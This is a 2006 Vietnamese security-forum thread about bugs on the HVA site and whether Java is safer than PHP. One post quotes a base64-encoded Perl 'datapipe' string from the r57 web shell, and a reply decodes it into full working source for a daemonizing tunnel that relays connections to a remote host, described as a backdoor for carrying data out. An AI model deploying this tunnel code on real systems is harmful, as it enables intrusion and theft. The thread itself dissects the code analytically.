banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Site HVA có lỗi ?  XML
  [Question]   Site HVA có lỗi ? 11/07/2006 00:17:46 (+0700) | #31 | 5626
[Avatar]
xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!] [MSN]

conmale wrote:

hackernohat wrote:
Thế mới chết hehe có bít bug của nó cũng hổng chắc bít Exploit ra sao hichic mấy cụ Admin tính kĩ quá  


Sao biết được có bug hay không có bug hay vậy? Hay lại lò dò vào bug track để xem bug thiên hạ công bố? :twisted:

Thông thường chẳng mấy ai rành Java mà bỏ thời gian ra để viết 1 con j99 đâu smilie (j for java). Họ để dành thời gian làm chuyện ích lợi hơn là tạo tool cho kiddie phá phách :twisted:  


He xin lỗi tui đang lò dò với cái đống mã down về từ internet xem có cái bug nào không ý mà ( nhưng hic hình như chưa đụng cái nào như trước nay từng gặp cả ).Hey mấy cái r57 hay c99 hay mấy con shell chỉ làm cho dễ hơn thui chứ đâu có gì đặc biệt,nó chỉ là tổng hợp chức năng tui chứ làm bằng tay vẫn ngon bác ạ, em là "kiddie" mà cũng bít "chút ít" món khai thác bằng tay thưa bác. :twisted:
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 11/07/2006 00:18:21 (+0700) | #32 | 5627
chuotkhongrang
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 00:08:48
Messages: 24
Offline
[Profile] [PM]
Vâng em biết là ngôn ngữ nào lập trình nếu mình không viết 1 cách chặc chẽ sẽ bị lỗi nhưng theo em thấy khi mình viết java khi mình dùng một biến nào đó thì mình cần phải định nghĩa nó còn không thì không dùng được còn đối với php thì các sử dụng biến có vẻ thoải mái hơn(em chưa học php chi nghe người ta nói) vì việc sử dụng biết có vẻ thoải mái này khiến cho người lập trình trong lúc viết chương trình đôi khi ko định nghĩa vẫn sử dụng được và thía nếu 1 hacker biết được điểm này họ sẽ khai thác được nếu họ định nghĩa lại biến đó(ví dụ up 1 con r57 chẳng hạn (vniss chuyên gia sử dụng mấy cái này hihi)).

Anh Comale tại sao người ta nói java có tính bảo mật cao hơn với so với ngôn ngữ lập trình khác.





[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 11/07/2006 01:14:24 (+0700) | #33 | 5639
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

chuotkhongrang wrote:
Vâng em biết là ngôn ngữ nào lập trình nếu mình không viết 1 cách chặc chẽ sẽ bị lỗi nhưng theo em thấy khi mình viết java khi mình dùng một biến nào đó thì mình cần phải định nghĩa nó còn không thì không dùng được còn đối với php thì các sử dụng biến có vẻ thoải mái hơn(em chưa học php chi nghe người ta nói) vì việc sử dụng biết có vẻ thoải mái này khiến cho người lập trình trong lúc viết chương trình đôi khi ko định nghĩa vẫn sử dụng được và thía nếu 1 hacker biết được điểm này họ sẽ khai thác được nếu họ định nghĩa lại biến đó(ví dụ up 1 con r57 chẳng hạn (vniss chuyên gia sử dụng mấy cái này hihi)).
 

Tính linh động và mạnh mẽ của một ngôn ngữ lập trình không chỉ dừng lại ở chỗ dùng "biến". So sánh php và java thì hơi khập khiễng vì php nặng procedural, pseduo-object oriented. Trong khi đó, java là true OO. Vấn đề "thoải mái" hay không còn đụng chạm đến chuyện thành thạo + quen dùng một ngôn ngữ nữa. So sánh không có khuôn khổ, thang bực thì không khéo trật chìa.

chuotkhongrang wrote:

Anh Comale tại sao người ta nói java có tính bảo mật cao hơn với so với ngôn ngữ lập trình khác.
 

Hì, tại sao em không thử tìm hiểu xem? smilie

"Nghe người ta nói" là điều nên tránh xa, nhất là đối với dân lập trình + bảo mật.

Nói về mặt kỹ thuật, java là ngôn ngữ có data type rất cụ thể và chặc chẽ. Em có thể "cast" type nhưng không phải là cast thế nào cũng được. Riêng chuyện "java bảo mật hơn" thì anh đã trả lời trong bài trước. Nói lại 1 lần nữa: chương trình có bảo mật hay không là do người tạo ra nó chớ chẳng phải do loại ngôn ngữ lập trình họ dùng.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 11/07/2006 03:21:26 (+0700) | #34 | 5676
[Avatar]
Vickizw
Member

[Minus]    0    [Plus]
Joined: 06/07/2006 19:55:29
Messages: 339
Location: ColTech
Offline
[Profile] [PM] [WWW]
ĐÚng rồi
em rất thích câu này
bảo mật tốt hay không là do người lập trình chứ không phải do ngôn ngữ
giống như học giỏi hay không là do người học chứ không phải do môn học
:lol:
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 11/07/2006 17:12:17 (+0700) | #35 | 5810
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

hackernohat wrote:

conmale wrote:

hackernohat wrote:
Thế mới chết hehe có bít bug của nó cũng hổng chắc bít Exploit ra sao hichic mấy cụ Admin tính kĩ quá  


Sao biết được có bug hay không có bug hay vậy? Hay lại lò dò vào bug track để xem bug thiên hạ công bố? :twisted:

Thông thường chẳng mấy ai rành Java mà bỏ thời gian ra để viết 1 con j99 đâu smilie (j for java). Họ để dành thời gian làm chuyện ích lợi hơn là tạo tool cho kiddie phá phách :twisted:  


He xin lỗi tui đang lò dò với cái đống mã down về từ internet xem có cái bug nào không ý mà ( nhưng hic hình như chưa đụng cái nào như trước nay từng gặp cả ).Hey mấy cái r57 hay c99 hay mấy con shell chỉ làm cho dễ hơn thui chứ đâu có gì đặc biệt,nó chỉ là tổng hợp chức năng tui chứ làm bằng tay vẫn ngon bác ạ, em là "kiddie" mà cũng bít "chút ít" món khai thác bằng tay thưa bác. :twisted:
 


Hì hì, hay lắm... làm "bằng tay" hả? Vậy bồ cho biết giá trị:

Code:
$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";


Trong con r57 là gì và nó có tác dụng gì vậy? :lol:
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Re: Site HVA có lỗi ? 11/07/2006 20:57:38 (+0700) | #36 | 5828
subnetwork
Member

[Minus]    0    [Plus]
Joined: 05/09/2004 06:08:09
Messages: 1666
Offline
[Profile] [PM] [WWW] [Yahoo!]
Bài viết site HVA có lỗi hay không ? nó có lỗi là chuyện đương nhiên, bảo mật không bao giờ gọi là tuyệt đối cả .

He he tui không phải hacker cũng chẳng phải là dân bảo mật và cũng không bao giờ dùng bug search.php được hacker thực thụ phân tán từ mạng Internet rồi tiến hành ăn cắp sản phẩm của người khác rồi đi các diễn đàn khác la làng lên là "sản phẩm" của mình .

Cái này người dân ở trong Nam như tôi, người ta còn gọi là hai từ rất dễ thương "chôm chĩa" . Hỡ thấy người ta sơ xuất điều gì là "chĩa" đó mà smilie
Quản lý máy chủ, cài đặt, tư vấn, thiết kế, bảo mật hệ thống máy chủ dùng *nix
http://chamsocmaychu.com
[Up] [Print Copy]
  [Question]   Re: Site HVA có lỗi ? 11/07/2006 22:11:01 (+0700) | #37 | 5846
[Avatar]
lQ
Moderator

Joined: 29/03/2005 17:06:20
Messages: 494
Offline
[Profile] [PM]
HVA có lỗi: trang Home index quan niệm khung nhìn của 1 topic có 20 posts trong khi trang Forum index và trang topic details lại quan niệm khung nhìn chỉ = 15 => ko đồng nhất về thứ tự post giữa bên trong và bên ngoài.
[Up] [Print Copy]
  [Question]   Re: Site HVA có lỗi ? 11/07/2006 22:22:15 (+0700) | #38 | 5849
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

lQ wrote:
Có nên fix cái này ko nhỉ:

list.html wrote:
Bugs hunting Do thành viên HVA phát hiện. 4 55 11/07/2006 09:57:38 Golden Autumn [Latest Reply]
<a href="/hvaonline/posts/list/20/872.html#5828"><img src="/hvaonline/templates/viet/images/icon_latest_reply.gif" border="0" alt="[Latest Reply]" title="[Lastest Reply]"/></a> 
 


Trong khi đó:

forums/show/15.html wrote:
Site HVA có lỗi ? [ Chuyển đến trang: 1, 2, 3 ] 35 dungphp 732 11/07/2006 09:57:38
Golden Autumn [Latest Reply]
<a href="/hvaonline/posts/list/30/872.html#5828"><img src="/hvaonline/templates/viet/images/icon_latest_reply.gif" border="0" alt="[Latest Reply]" /></a> 
 


=> Danh sách page #2 truy xuất từ list.html khác với danh sách page #2 truy xuất từ forum.html 


Hì hì, em phát hiện lỗi này hay lắm smilie

Cái này do bộ cache giữa forum chính và forum con không cập nhật đồng bộ đó thôi. Tuy nhiên, đường dẫn (được translated bên trong) vẫn đúng.

Cái này có thể fix được nhưng... low priority smilie

Thân.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 11/07/2006 22:29:30 (+0700) | #39 | 5852
[Avatar]
lQ
Moderator

Joined: 29/03/2005 17:06:20
Messages: 494
Offline
[Profile] [PM]
Anh conmale nhanh thiệt, em đang chỉnhh lại post mà anh đã reply rồi. Em đoán nguyên nhân là khung nhìn 15/20 (đã ghi ở trên).
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 12/07/2006 05:21:44 (+0700) | #40 | 5961
chuotkhongrang
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 00:08:48
Messages: 24
Offline
[Profile] [PM]
Em biết thế nào anh cũng nói em tự tìm hiểu.
"Chương trình có bảo mật hay không là do người tạo ra nó chớ chẳng phải do loại ngôn ngữ lập trình họ dùng." Điều này thì quá rõ ràng rồi ko cần anh nhắc lại.

"học giỏi hay không là do người học chứ không phải do môn học "

Tui hỏi ông nha tại sao môn "thể dục" có nhiều người học giỏi hơn môn "toán"


Nói tóm lại mỗi ngôn ngữ có 1 thế mạnh của nó trong một lĩnh vực nào đó.









[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 12/07/2006 05:46:10 (+0700) | #41 | 5969
[Avatar]
Vickizw
Member

[Minus]    0    [Plus]
Joined: 06/07/2006 19:55:29
Messages: 339
Location: ColTech
Offline
[Profile] [PM] [WWW]
Chuotkhongrang wrote :
"học giỏi hay không là do người học chứ không phải do môn học "

Tui hỏi ông nha tại sao môn "thể dục" có nhiều người học giỏi hơn môn "toán"  

Thứ nhất chưa có tài liệu nào nói thể dục nhiều người giỏi hơn môn toán
Thứ hai giả sử có đi nữa thì cũng do nhiều người thích môn thể dục hơn môn toán hoặc do có nhiều người có năng khiếu thể dục hơn là toán học chứ không phải tại môn thể dục dễ hơn môn toán
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 12/07/2006 17:22:55 (+0700) | #42 | 6075
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

chuotkhongrang wrote:
Em biết thế nào anh cũng nói em tự tìm hiểu.
"Chương trình có bảo mật hay không là do người tạo ra nó chớ chẳng phải do loại ngôn ngữ lập trình họ dùng." Điều này thì quá rõ ràng rồi ko cần anh nhắc lại.
 


- em chưa chứng tỏ sự quan tâm đúng mức đến vấn đề mà chỉ hỏi suôn nên anh mới đề nghị em tìm hiểu thử. Nếu em cung cấp thêm một số thông tin chứng tỏ em đã "xem qua" thì anh đã không đề nghị em tìm hiểu. Cái này tốt cho em chớ chẳng phải tốt cho anh.

- Anh nhắc lại câu ấy vì em hỏi vấn đề này lần thứ hai.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 12/07/2006 18:38:43 (+0700) | #43 | 6079
chuotkhongrang
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 00:08:48
Messages: 24
Offline
[Profile] [PM]
bữa nay em sẽ tập đặt ra những câu hỏi" why" chứ không đặt nhưng câu hỏi "what" nữa đâu hihi

Thứ nhất chưa có tài liệu nào nói thể dục nhiều người giỏi hơn môn toán 

Cái này tài liệu đầy ra ở các trường học cần thì lên hỏi hiệu trưởng nói cho mà nghe
Thứ hai giả sử có đi nữa thì cũng do nhiều người thích môn thể dục hơn môn toán hoặc do có nhiều người có năng khiếu thể dục hơn là toán học chứ không phải tại môn thể dục dễ hơn môn toán 


Tại sao nhiều người thích môn thể dục, vì nó gần gũi với con người hơn nên nó dễ học hơn so với môn Toán khô khan đòi khó tiếp thu hơn hỏi phải có sự khiên trì nhẫn nại nhiều hơn.
Nếu cần thì so sánh thêm thì học html dễ học hơn học Java nhiều.

Có thể tôi và bạn đi lạc đề trong topic này rồi muốn 8 thì ra yahoo nha.


[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 12/07/2006 21:29:46 (+0700) | #44 | 6109
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

hackernohat wrote:
Thế mới chết hehe có bít bug của nó cũng hổng chắc bít Exploit ra sao hichic mấy cụ Admin tính kĩ quá  


Chỉ có môt cụ ( có dấu nặng đấy ) thôi .

Còn các cụ ( chữ này nếu quên dấu nặng thì cũng không sao ) khác và bọn chúng tớ chỉ là râu ria , góp thêm vài ý vớ vẩn bên ngoài
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 13/07/2006 05:17:26 (+0700) | #45 | 6250
[Avatar]
hakuso
HVA Friend

Joined: 04/01/2004 13:28:06
Messages: 287
Location: làng Đo Đo
Offline
[Profile] [PM]

chuotkhongrang wrote:
Tại sao nhiều người thích môn thể dục, vì nó gần gũi với con người hơn nên nó dễ học hơn so với môn Toán khô khan đòi khó tiếp thu hơn hỏi phải có sự khiên trì nhẫn nại nhiều hơn. Nếu cần thì so sánh thêm thì học html dễ học hơn học Java nhiều.  


Bạn nói như vậy là dựa trên chủ quan rồi. Giống như là nhận xét cô gái A đẹp hơn cô gái B vậy
Như thế thì không được :wink:
Live, fight, work and study
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 13/07/2006 10:24:58 (+0700) | #46 | 6302
[Avatar]
gamma95
Researcher

Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa&quot;&gt;
Offline
[Profile] [PM] [ICQ]
thống kê tại VN năm 2006 cho thấy : môn "giáo dục giới tính" mới có nhiều người học giỏi nhất ,hơn cả thể dục và toán ...

Cánh chym không mỏi
lol
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 14/07/2006 02:44:10 (+0700) | #47 | 6440
[Avatar]
hakuso
HVA Friend

Joined: 04/01/2004 13:28:06
Messages: 287
Location: làng Đo Đo
Offline
[Profile] [PM]

gamma95 wrote:
thống kê tại VN năm 2006 cho thấy : môn "giáo dục giới tính" mới có nhiều người học giỏi nhất ,hơn cả thể dục và toán ...

 


bi giờ mới là 07/2006
hmm, thống kê còn dài smilie
Live, fight, work and study
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 14/07/2006 04:01:12 (+0700) | #48 | 6457
[Avatar]
gausua
Member

[Minus]    0    [Plus]
Joined: 13/07/2006 13:57:24
Messages: 4
Offline
[Profile] [PM] [MSN]
Em thấy bắt đầu lạc đề rồi. Chuyện lỗi là tất yếu nhưng hạn chế lỗi khi code chương trình thì là 1 điều mà chưa bao h thiếu. Ngay thằng Win nó cũng 1 tháng 1 bản pacth thì ......Mọi người đang đi tìm lỗi mà, lại 8 lung tung rồi.
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 14/07/2006 13:56:42 (+0700) | #49 | 6590
[Avatar]
Luke
Elite Member

[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]

conmale wrote:

Hì hì, hay lắm... làm "bằng tay" hả? Vậy bồ cho biết giá trị:

Code:
$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";


Trong con r57 là gì và nó có tác dụng gì vậy? :lol:  

Em xin trả lời hộ vì bác hackernohat đang còn trong Trâu Quỳ chữa bệnh. Thấy bác lặn mất tăm rồi
đoạn code trên tương đương với
Code:
#!/usr/bin/perl
use IO::Socket;
use POSIX;
$localport = $ARGV[0];
$host      = $ARGV[1];
$port      = $ARGV[2];
$daemon=1;
$DIR = undef;
$| = 1;
if ($daemon){ $pid = fork; exit if $pid; die "$!" unless defined($pid); POSIX::setsid() or die "$!"; }
%o = ('port' => $localport,'toport' => $port,'tohost' => $host);
$ah = IO::Socket::INET->new('LocalPort' => $localport,'Reuse' => 1,'Listen' => 10) || die "$!";
$SIG{'CHLD'} = 'IGNORE';
$num = 0;
while (1) { 
$ch = $ah->accept(); if (!$ch) { print STDERR "$!\n"; next; }
++$num;
$pid = fork();
if (!defined($pid)) { print STDERR "$!\n"; } 
elsif ($pid == 0) { $ah->close(); Run(\%o, $ch, $num); } 
else { $ch->close(); }
}
sub Run {
my($o, $ch, $num) = @_;
my $th = IO::Socket::INET->new('PeerAddr' => $o->{'tohost'},'PeerPort' => $o->{'toport'});
if (!$th) { exit 0; }
my $fh;
if ($o->{'dir'}) { $fh = Symbol::gensym(); open($fh, ">$o->{'dir'}/tunnel$num.log") or die "$!"; }
$ch->autoflush();
$th->autoflush();
while ($ch || $th) {
my $rin = "";
vec($rin, fileno($ch), 1) = 1 if $ch;
vec($rin, fileno($th), 1) = 1 if $th;
my($rout, $eout);
select($rout = $rin, undef, $eout = $rin, 120);
if (!$rout  &&  !$eout) {}
my $cbuffer = "";
my $tbuffer = "";
if ($ch && (vec($eout, fileno($ch), 1) || vec($rout, fileno($ch), 1))) {
my $result = sysread($ch, $tbuffer, 1024);
if (!defined($result)) {
print STDERR "$!\n";
exit 0;
}
if ($result == 0) { exit 0; }
}
if ($th  &&  (vec($eout, fileno($th), 1)  || vec($rout, fileno($th), 1))) {
my $result = sysread($th, $cbuffer, 1024);
if (!defined($result)) { print STDERR "$!\n"; exit 0; }
if ($result == 0) {exit 0;}
}
if ($fh  &&  $tbuffer) {(print $fh $tbuffer);}
while (my $len = length($tbuffer)) {
my $res = syswrite($th, $tbuffer, $len);
if ($res > 0) {$tbuffer = substr($tbuffer, $res);} 
else {print STDERR "$!\n";}
}
while (my $len = length($cbuffer)) {
my $res = syswrite($ch, $cbuffer, $len);
if ($res > 0) {$cbuffer = substr($cbuffer, $res);} 
else {print STDERR "$!\n";}
}}}

Cái này để mở cổng sau, thừa cơ khuân đồ đạc ra. Cái này bọn trộm thường khoái dùng với "con mèo"
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 14/07/2006 14:09:08 (+0700) | #50 | 6592
[Avatar]
Luke
Elite Member

[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]
A`, bây giờ mới biết tại sao bác hackernohat phải đi Trâu Quỳ
Vừa mới đọc lại code của con r57
Thấy r57 có 2 phiên bản

Phiên bản tiếng Anh thì không có chức năng back-connect, chính xác là chỉ loại bỏ gọi UI
Phiên bản tiếng Nga gốc có 3 cái back-connect
Thế nên đoạn code trên [tiếng Anh] chẳng có tác dụng gì cả, cho nên mấy script kiddie chỉ biết dùng mà chắc chắn cũng chẳng biết để làm gì.
Hỏi 1 câu như thế, bác conmale thâm thật
